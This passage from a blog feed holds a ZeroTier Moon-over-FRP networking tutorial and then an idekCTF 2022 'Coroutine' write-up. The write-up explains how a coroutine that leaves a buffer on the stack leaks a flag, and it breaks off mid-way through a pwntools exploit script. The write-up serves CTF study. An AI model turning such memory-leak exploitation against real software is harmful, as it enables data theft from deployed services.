class="line"><span class="comment">  * that we currently support for ZeroTier communication.</span></span><br><span class="line"><span class="comment">  *</span></span><br><span class="line"><span class="comment">  * @param a Address to check</span></span><br><span class="line"><span class="comment">  * @return True if address is good for ZeroTier path use</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">bool</span> <span class="title">isAddressValidForPath</span><span class="params">(<span class="type">const</span> InetAddress &amp;a)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> ((a.ss_family == AF_INET)||(a.ss_family == AF_INET6)) &#123;</span><br><span class="line">        <span class="keyword">switch</span>(a.<span class="built_in">ipScope</span>()) &#123;</span><br><span class="line">                <span class="comment">/* Note: we don&#x27;t do link-local at the moment. Unfortunately these</span></span><br><span class="line"><span class="comment">         * cause several issues. The first is that they usually require a</span></span><br><span class="line"><span class="comment">         * device qualifier, which we don&#x27;t handle yet and can&#x27;t portably</span></span><br><span class="line"><span class="comment">         * push in PUSH_DIRECT_PATHS. The second is that some OSes assign</span></span><br><span class="line"><span class="comment">         * these very ephemerally or otherwise strangely. So we&#x27;ll use</span></span><br><span class="line"><span class="comment">         * private, pseudo-private, shared (e.g. carrier grade NAT), or</span></span><br><span class="line"><span class="comment">         * global IP addresses. 
*/</span></span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_PRIVATE:</span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_PSEUDOPRIVATE:</span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_SHARED:</span><br><span class="line">            <span class="keyword">case</span> InetAddress::IP_SCOPE_GLOBAL:</span><br><span class="line">                <span class="keyword">if</span> (a.ss_family == AF_INET6) &#123;</span><br><span class="line">                    <span class="comment">// TEMPORARY <span class="doctag">HACK:</span> for now, we are going to blacklist he.net IPv6</span></span><br><span class="line">                    <span class="comment">// tunnels due to very spotty performance and low MTU issues over</span></span><br><span class="line">                    <span class="comment">// these IPv6 tunnel links.</span></span><br><span class="line">                    <span class="type">const</span> <span class="type">uint8_t</span> *ipd = <span class="built_in">reinterpret_cast</span>&lt;<span class="type">const</span> <span class="type">uint8_t</span> *&gt;(<span class="built_in">reinterpret_cast</span>&lt;<span class="type">const</span> <span class="keyword">struct</span> sockaddr_in6 *&gt;(&amp;a)-&gt;sin6_addr.s6_addr);</span><br><span class="line">                    <span class="keyword">if</span> ((ipd[<span class="number">0</span>] == <span class="number">0x20</span>)&amp;&amp;(ipd[<span class="number">1</span>] == <span class="number">0x01</span>)&amp;&amp;(ipd[<span class="number">2</span>] == <span class="number">0x04</span>)&amp;&amp;(ipd[<span class="number">3</span>] == <span class="number">0x70</span>)) &#123;</span><br><span class="line">                        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">                    &#125;</span><br><span 
class="line">                &#125;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            <span class="keyword">default</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>These include <code>IP_SCOPE_PRIVATE</code> (LAN addresses) and <code>IP_SCOPE_GLOBAL</code> (public addresses), but not <code>IP_SCOPE_LOOPBACK</code> (loopback addresses).</p><p>After receiving a UDP packet, Zerotier reads the packet's <strong>destination IP</strong> and uses it to decide whether the packet is valid. The logic is easy to follow: knowing which of its own IP addresses the peer sent the packet to tells Zerotier which network interface can be used for p2p hole punching.</p><p>But if FRP is bound to the local 127.0.0.1, then even though other peers can deliver packets through FRP to <code>udp://127.0.0.1:9993</code>, Zerotier discards the received UDP data and p2p fails.</p><h2 id="三、Frpc-测试">III. Frpc Testing</h2><p>Once the tunnel has been created and the Frpc tunnel is connected on the machine hosting the remote moon node, the next step is to <strong>test UDP send/receive between the host and the moon</strong>.</p><p><strong>This step is very important</strong>: because of the nature of UDP, many networks filter UDP packets strictly.</p><blockquote><p>For example, I could not send or receive UDP packets on my campus network.</p></blockquote><p>The test steps are simple:</p><ol><li><p><strong>Change the port that frpc forwards to on the moon machine</strong> from 9993 to 9992, then restart frpc. Tunneled UDP data should now be delivered to local port 9992.</p><p>This can be done either by editing frpc.ini directly or by changing the setting in the web panel and pulling the configuration file again.</p><p>There is nothing special about port 9992; any port you can remember will do. The port is changed because 9993 is already occupied by the Zerotier service, and a single port cannot be listened on by several UDP services at once.</p></li><li><p><strong>Start a UDP echo server on the moon machine</strong>. Here is the Python code I used for testing:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># python3 /tmp/udp-echoserver.py 192.168.XX.XX 9992</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">udp_echo_server</span>(<span class="params">host, port</span>):</span><br><span class="line">    server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</span><br><span class="line">    server_socket.bind((host, port))</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;UDP Echo server started on <span class="subst">&#123;host&#125;</span>:<span class="subst">&#123;port&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">       data, addr = server_socket.recvfrom(<span class="number">1024</span>)</span><br><span class="line">       <span class="built_in">print</span>(<span class="string">f&quot;Received data from <span class="subst">&#123;addr&#125;</span>: <span class="subst">&#123;<span class="built_in">len</span>(data)&#125;</span>&quot;</span>)</span><br><span class="line">       server_socket.sendto(<span class="string">b&quot;server: &quot;</span> + data, addr)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    
<span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &lt; <span class="number">3</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Usage: python udp_echo_server.py &lt;host&gt; &lt;port&gt;&quot;</span>)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line">    host = sys.argv[<span class="number">1</span>]</span><br><span class="line">    port = <span class="built_in">int</span>(sys.argv[<span class="number">2</span>])</span><br><span class="line">    udp_echo_server(host, port)</span><br></pre></td></tr></table></figure></li><li><p>On the host, run <code>nc -u &lt;ip&gt; &lt;port&gt;</code> to send UDP packets to the Frpc relay server and check whether they are echoed back.</p></li></ol><p>The result looks like this. The top two windows in the screenshot are shells on the moon server, and the bottom window is a shell on the host. The host runs <code>nc -u &lt;ip&gt; &lt;port&gt;</code>, types data at the interactive prompt, and presses Enter to send it. The UDP packet goes to the Frpc relay server and is tunneled to the moon at <code>udp://192.168.x.x:9992</code>; the echo server on port 9992 then returns it to the sender. <strong>As long as the host gets its data echoed back after sending a UDP packet, UDP send/receive works in both directions.</strong></p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517135624795.png" alt="image-20230517135624795"></p><p>This step may fail. There are two main causes (I have run into both):</p><ol><li><p>The <strong>port number assigned by the public Frpc relay server is too high</strong>, e.g. 50000+. High UDP port numbers may be filtered by routing policies; the only fix is to request a new UDP tunnel or switch to another relay node in order to <strong>get a lower UDP port number</strong>.</p><blockquote><p>In my tests, UDP port numbers &lt; 30000 have almost never caused problems.</p></blockquote></li><li><p><strong>Complex or restricted networks may limit UDP traffic</strong>, for example campus networks. On my campus network I could not send or receive UDP packets, but the UDP test passed after switching to a phone hotspot.</p></li></ol><blockquote><p>To check whether port 9993 is receiving packets, you can use: <code>sudo tshark -i any udp port 9993 and src host 192.168.x.x</code></p><p><strong>Remember to change the tunnel port back to 9993 once the UDP test is done</strong>.</p></blockquote><h2 id="四、Zerotier-Moon-搭建">IV. Setting Up the Zerotier Moon</h2><p>There are plenty of tutorials online for setting up a Zerotier Moon, and they are all much the same. You can refer to this one: <a 
href="https://dengzile.com/2019/05/%E6%90%AD%E5%BB%BAzerotier%E7%9A%84moon%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%B0%8F%E8%AE%B0/">搭建ZeroTier的Moon服务器小记 - dengzile</a></p><ul><li><p>Moon server:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 0. Switch to the working directory</span></span><br><span class="line"><span class="built_in">cd</span> /var/lib/zerotier-one</span><br><span class="line"></span><br><span class="line"><span class="comment"># 1. Create the base moon file</span></span><br><span class="line"><span class="built_in">sudo</span> zerotier-idtool initmoon identity.public &gt; moon.json</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. Edit stableEndpoints in moon.json to the public IP and port assigned by Frpc</span></span><br><span class="line"><span class="comment"># (note that this tunnel must map to port 9993 on the moon)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. Sign moon.json to generate the moon file</span></span><br><span class="line"><span class="built_in">sudo</span> zerotier-idtool genmoon moon.json</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4. 
Move the signed moon file into the moons.d folder</span></span><br><span class="line"><span class="built_in">mkdir</span> moons.d</span><br><span class="line"><span class="built_in">mv</span> 000000*.moon moons.d</span><br><span class="line"></span><br><span class="line"><span class="comment"># 5. Restart the zerotier-one service</span></span><br><span class="line"><span class="built_in">sudo</span> service zerotier-one restart</span><br><span class="line"></span><br><span class="line"><span class="comment"># 6. The current moons can now be listed</span></span><br><span class="line"><span class="built_in">sudo</span> zerotier-cli listmoons</span><br></pre></td></tr></table></figure></li><li><p>Windows (local machine): open cmd <strong>with administrator privileges</strong>:</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"># <span class="number">0</span>. Switch to the working directory</span><br><span class="line"><span class="function">C:\<span class="title">Users</span>\<span class="title">Kiprey</span>&gt;<span class="title">cd</span> <span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"># 1. 
Create the <span class="title">moons.d</span> folder and switch into it</span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span>&gt;<span class="title">mkdir</span> <span class="title">moons.d</span></span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span>&gt;<span class="title">cd</span> <span class="title">moons.d</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"># 2. Copy the <span class="title">moon</span> file from the remote <span class="title">moon</span> node. Since the <span class="title">moon</span> is not configured yet, this download actually goes through <span class="title">UDP</span> relay.</span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">ProgramData</span>\<span class="title">ZeroTier</span>\<span class="title">One</span>\<span class="title">moons.d</span>&gt;<span class="title">scp</span> <span class="title">kiprey</span>@172.24.0.133:/<span class="title">var</span>/<span class="title">lib</span>/<span class="title">zerotier</span>-<span class="title">one</span>/<span class="title">moons.d</span>/000000<span class="title">xxxxxxxxxx.moon</span> .</span></span><br><span class="line"><span class="function">000000<span class="title">xxxxxxxxxx.moon</span>                        100%  259     0.5<span class="title">KB</span>/<span class="title">s</span>   00:00</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"># 3. 
Restart the service</span></span><br><span class="line"><span class="function"># Press <span class="title">win</span> + <span class="title">R</span> to open the &quot;Run&quot; window -&gt; <span class="title">services.msc</span> -&gt; find the <span class="title">Zerotier</span>-<span class="title">One</span> service and restart it</span></span><br></pre></td></tr></table></figure></li></ul><blockquote><p>Distributing the moon file like this should also be possible with the <code>zerotier-cli orbit</code> command, but in my testing orbit sometimes failed, i.e. the moon file was not delivered. I am not sure what went wrong, so I ended up downloading it manually.</p><p>That said, this is a minor issue, mentioned only in passing.</p></blockquote><p>After restarting the local Zerotier service, run <code>zerotier-cli peers</code>: the Moon node and the nodes near the Moon have all switched from RELAY to DIRECT:</p><ul><li><p>Before configuring the moon:</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517142839955.png" alt="image-20230517142839955"></p><p>Average sshping latency was as high as 300ms, and ssh sessions stuttered.</p></li><li><p>After configuring the moon:</p><p><img src="/2023/05/zerotier_moon_frpc/image-20230517142520240.png" alt="image-20230517142520240"></p><p>sshping latency dropped to around 100ms, and ssh became noticeably smoother.</p></li></ul>]]></content>
    
    
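    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;Zerotier is a tool dedicated to networking machines across different sites. It makes it easy to connect multiple remote machines, via P2P or Relay, with an experience as smooth as a LAN.&lt;/p&gt;
&lt;p&gt;Nodes in a Zerotier network fall into three kinds: Planet, the central servers located abroad; Moon, user-hosted nodes; and Leaf, the user's other nodes.&lt;/p&gt;
&lt;p&gt;Because the Planets are located abroad, when two machines are geographically far apart, both UDP hole punching and Relay are very slow, so I tried hosting a Zerotier Moon inside China to improve the hole-punching success rate and the relay speed.&lt;/p&gt;
&lt;p&gt;Online tutorials for setting up a Zerotier Moon all require buying a server, but I did not want to go to that trouble, so I explored setting one up through FRPC NAT traversal.&lt;/p&gt;</summary>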
    
    
    
    <category term="Tools" scheme="https://kiprey.github.io/categories/Tools/"/>
    
    
    <category term="ZeroTier" scheme="https://kiprey.github.io/tags/ZeroTier/"/>
    
  </entry>
  
  <entry>
    <title>idekCTF2022 - Coroutine Writeup</title>
    <link href="https://kiprey.github.io/2023/01/idek_coroutine/"/>
    <id>https://kiprey.github.io/2023/01/idek_coroutine/</id>
    <published>2023-01-20T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.021Z</updated>
    
    <content type="html"><![CDATA[<h2 id="Introduction">Introduction</h2><p>Last weekend I participated in <code>idekCTF 2022</code> with r3kapig. After briefly browsing the other pwn challenges, I tried <code>Coroutine</code> and finally solved it (4 solves in total).</p><p>Now, let’s dive into this challenge!</p><span id="more"></span><h2 id="C-20-Coroutine">C++20 Coroutine</h2><p>What is a coroutine?</p><blockquote><p>A coroutine is a function that <strong>can suspend execution</strong> to <strong>be resumed later</strong>. Coroutines are <strong>stackless</strong>: they suspend execution by returning to the caller and the <strong>data that is required to resume execution is stored separately from the stack</strong>. This allows for sequential code that executes asynchronously (e.g. to handle non-blocking I/O without explicit callbacks), and also supports algorithms on lazy-computed infinite sequences and other uses.</p><p>ref: <a href="https://en.cppreference.com/w/cpp/language/coroutines">Coroutines (C++20) - cppreference</a></p></blockquote><p>As we have seen, coroutines are executed in <strong>a single-threaded environment</strong>; they can be <strong>paused as needed during execution</strong> (e.g. while waiting for a response from a peer) and later <strong>resumed at a suitable time</strong> (e.g. once the reply from the peer arrives).</p><p>What does this mean?</p><ol><li>The execution environment may be <strong>different before and after</strong> the <code>co_await</code> statement (e.g. the current thread id).</li><li>If the coroutine holds <strong>an outer pointer or reference</strong>, this may cause memory-safety problems (e.g. UAF, UAP…)</li></ol><h2 id="Program-Logic">Program Logic</h2><p>The user can interact with the proxy to <strong>change the proxy receive buffer size and send buffer size</strong>. Interestingly, the size of the program’s own send buffer is manually set to 128 bytes. 
These hints suggest that the <strong>vulnerability is most likely related to the socket buffer size</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> sendbuff = <span class="number">128</span>;</span><br><span class="line"><span class="built_in">setsockopt</span>(accept_result, SOL_SOCKET, SO_SNDBUF, &amp;sendbuff, <span class="built_in">sizeof</span>(sendbuff));</span><br></pre></td></tr></table></figure><p>After reading the source code carefully, we can see that the program acts as an <strong>echo server</strong>, reading messages from the proxy and sending them back:</p><ol><li><p>Create and execute the coroutine. Inside the coroutine, the program accepts a client connection and enters <code>client_loop</code> to repeatedly receive messages from the client and send them back.</p></li><li><p>If the program cannot receive a message from the client (e.g. there is currently no data from the client), or cannot send a message to the client (e.g. 
the socket buffer is full), the coroutine saves its own coroutine handle and suspends itself, returning to the caller:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">class</span> <span class="title">RecvAsync</span><span class="params">(SendAsync)</span> : NonCopyable &#123;</span></span><br><span class="line"><span class="keyword">public</span>:</span><br><span class="line">    ...</span><br><span class="line">    <span class="function"><span class="keyword">auto</span> <span class="keyword">operator</span> <span class="title">co_await</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Awaiter</span> &#123;</span><br><span class="line">            ...</span><br><span class="line"></span><br><span class="line">            <span class="function"><span class="type">bool</span> <span class="title">await_ready</span><span class="params">()</span> </span>&#123;</span><br><span class="line">                ...</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="function"><span class="type">void</span> <span 
class="title">await_suspend</span><span class="params">(std::coroutine_handle&lt;&gt; handle)</span> <span class="keyword">noexcept</span> </span>&#123;</span><br><span class="line">                <span class="comment">// save current coroutine handle </span></span><br><span class="line">                ctx_.<span class="built_in">add_read</span>(fd_, std::<span class="built_in">move</span>(handle));</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="function"><span class="type">int</span> <span class="title">await_resume</span><span class="params">()</span> </span>&#123;</span><br><span class="line">                ...</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="keyword">return</span> Awaiter&#123; ctx_, fd_, buffer_ &#125;;</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>The program then enters <code>io_context::run_until_done</code>, monitors the file descriptors with <code>select</code>, and resumes the corresponding coroutine whenever a file descriptor becomes ready.</p><p>Interestingly, on every iteration of the loop in <code>run_until_done</code>, the program calls <code>load_flag</code>, which loads the flag onto the stack.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">load_flag</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> flag[<span class="number">400</span>];</span><br><span class="line">    FILE* fp = <span class="built_in">fopen</span>(<span class="string">&quot;flag&quot;</span>, <span class="string">&quot;rt&quot;</span>);</span><br><span class="line">    <span class="built_in">fscanf</span>(fp, <span class="string">&quot;%s&quot;</span>, flag);</span><br><span class="line">    <span class="built_in">fclose</span>(fp);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">run_until_done</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (!reads_.<span class="built_in">empty</span>() || !writes_.<span class="built_in">empty</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">load_flag</span>();</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ol><h2 id="Vulnerability">Vulnerability</h2><p>I was interested in how the coroutine captures the context, so I modified the code and printed out the addresses of all the buffers. 
Here are some code snippets.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Task&lt;<span class="type">bool</span>&gt; <span class="title">client_loop</span><span class="params">(io_context&amp; ctx, <span class="type">int</span> socket)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">while</span> (<span class="literal">true</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        std::byte buffer[<span class="number">512</span>];</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;client_loop buffer before RecvAsync: %p\n&quot;</span>, buffer);</span><br><span class="line">        <span class="type">int</span> recved = <span class="keyword">co_await</span> <span class="built_in">RecvAsync</span>(ctx, socket, buffer);</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Output: client_loop buffer before RecvAsync: 0x5603212fff89</p></blockquote><p>This output indicates that the buffers in the coroutine will be <strong>created in the heap</strong>. In other words, this entire coroutine function is actually equivalent to a heap structure. 
This is why a coroutine can suspend and resume at different times: its context is preserved on the heap when it is created.</p><p>However, after carefully checking each buffer’s address, I found that the <strong>coroutine did not capture the <code>buffer2</code> in function <code>SendAllAsyncNewline</code></strong>. As the snippet below shows, that function contains no <code>co_await</code> or <code>co_return</code>, so it is an ordinary function rather than a coroutine. In other words, <code>buffer2</code> is located on the <strong>stack</strong>, <strong>not far from the memory location storing the flag</strong> (&lt; 512 bytes, 0x200).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">load_flag</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> flag[<span class="number">400</span>];</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;load_flag: %p\n&quot;</span>, flag);</span><br><span class="line">    FILE* fp = <span class="built_in">fopen</span>(<span class="string">&quot;flag&quot;</span>, <span class="string">&quot;rt&quot;</span>);</span><br><span class="line">    <span class="built_in">fscanf</span>(fp, <span class="string">&quot;%s&quot;</span>, flag);</span><br><span class="line">    <span 
class="built_in">fclose</span>(fp);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">Task&lt;<span class="type">bool</span>&gt; <span class="title">SendAllAsyncNewline</span><span class="params">(io_context&amp; ctx, <span class="type">int</span> socket, std::span&lt;std::byte&gt; buffer)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    std::byte buffer2[<span class="number">513</span>];</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;SendAllAsyncNewline buffer: %p\n&quot;</span>, buffer.<span class="built_in">data</span>());</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;SendAllAsyncNewline buffer2: %p\n&quot;</span>, buffer2);</span><br><span class="line">    std::<span class="built_in">copy</span>(buffer.<span class="built_in">begin</span>(), buffer.<span class="built_in">end</span>(), buffer2);</span><br><span class="line">    buffer2[buffer.<span class="built_in">size</span>()] = (std::byte)<span class="string">&#x27;\n&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">SendAllAsync</span>(ctx, socket, std::<span class="built_in">span</span>(buffer2, buffer.<span class="built_in">size</span>()<span class="number">+1</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Output:</p><ul><li><p>SendAllAsyncNewline buffer: 0x559806712f89</p></li><li><p>SendAllAsyncNewline buffer2: <strong>0x7ffc1ddfd3a0</strong></p></li><li><p>load_flag: <strong>0x7ffc1ddfd480</strong></p></li></ul></blockquote><p>And <code>SendAllAsync</code> will also <strong>send data multiple times</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Task&lt;<span class="type">bool</span>&gt; <span class="title">SendAllAsync</span><span class="params">(io_context&amp; ctx, <span class="type">int</span> socket, std::span&lt;std::byte&gt; buffer)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> offset = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> (offset &lt; buffer.<span class="built_in">size</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">int</span> result = <span class="keyword">co_await</span> <span class="built_in">SendAsync</span>(ctx, socket, std::<span class="built_in">span</span>(buffer.<span class="built_in">data</span>() + offset, buffer.<span class="built_in">size</span>() - offset));</span><br><span class="line">        <span class="keyword">if</span> (result == <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">co_return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        offset += result;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">co_return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If we can carefully 
interact with the proxy, we can leak the flag with the following steps:</p><ol><li>Fill the socket buffer in advance so that, between two <code>SendAsync</code> calls inside <code>SendAllAsync</code>, the coroutine suspends and control flow returns to <code>run_until_done</code>.</li><li>Execute the <code>load_flag</code> function to load the flag into stack memory that happens to overlap with <code>buffer2</code>.</li><li>Drain the proxy receive buffer so that the program resumes sending <code>buffer2</code> to the client. Since the flag was loaded over <code>buffer2</code> before the send finished, the flag is sent along with it.</li></ol><h2 id="Exploit">Exploit</h2><p>Once you have found <strong>the send-length threshold</strong> in the Docker environment, the hard part of the challenge is solved.</p><blockquote><p>Note: if you wish, you can find the send threshold more easily by modifying the source code.</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># io = remote(&quot;coroutine.chal.idek.team&quot;, 1337)</span></span><br><span class="line">io = process(<span class="string">&quot;python3 proxy.py&quot;</span>, shell=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">context(terminal=[<span class="string">&#x27;gnome-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;bash&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>], os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;info&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Change Receive Buffer</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;2&quot;</span>)</span><br><span class="line"><span class="comment"># Change Receive Buffer size to the 